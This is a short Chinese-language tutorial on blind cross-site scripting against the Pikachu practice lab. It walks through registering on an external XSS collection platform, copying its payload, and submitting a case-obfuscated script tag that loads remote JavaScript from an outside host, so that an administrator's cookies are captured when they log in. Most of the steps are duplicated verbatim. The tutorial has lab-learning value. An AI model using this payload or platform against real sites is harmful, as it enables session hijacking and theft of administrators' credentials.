一. 在https://xssaq.com/这个平台注册账号
二.创建项目 点击立即提交
创建好之后 点击你创建的项目 然后点击 查看配置代码 如下图
复制下图所框的代码
三.打开一个pikachu平台 打开xss盲打 将这条命令输入进去提交
<sCRiPt sRC=//d00.cc/60V></sCrIpT>
然后登陆后台 模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码
最后返回我们的xss平台 就可以看到cookie劫持 然后点击查看就可以看到cookie字段
二.创建项目 点击立即提交
创建好之后 点击你创建的项目 然后点击 查看配置代码 如下图
复制下图所框的代码
三.打开一个pikachu平台 打开xss盲打 将这条命令输入进去提交
<sCRiPt sRC=//d00.cc/60V></sCrIpT>
然后登陆后台 模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码
最后返回我们的xss平台 就可以看到cookie劫持 然后点击查看就可以看到cookie字段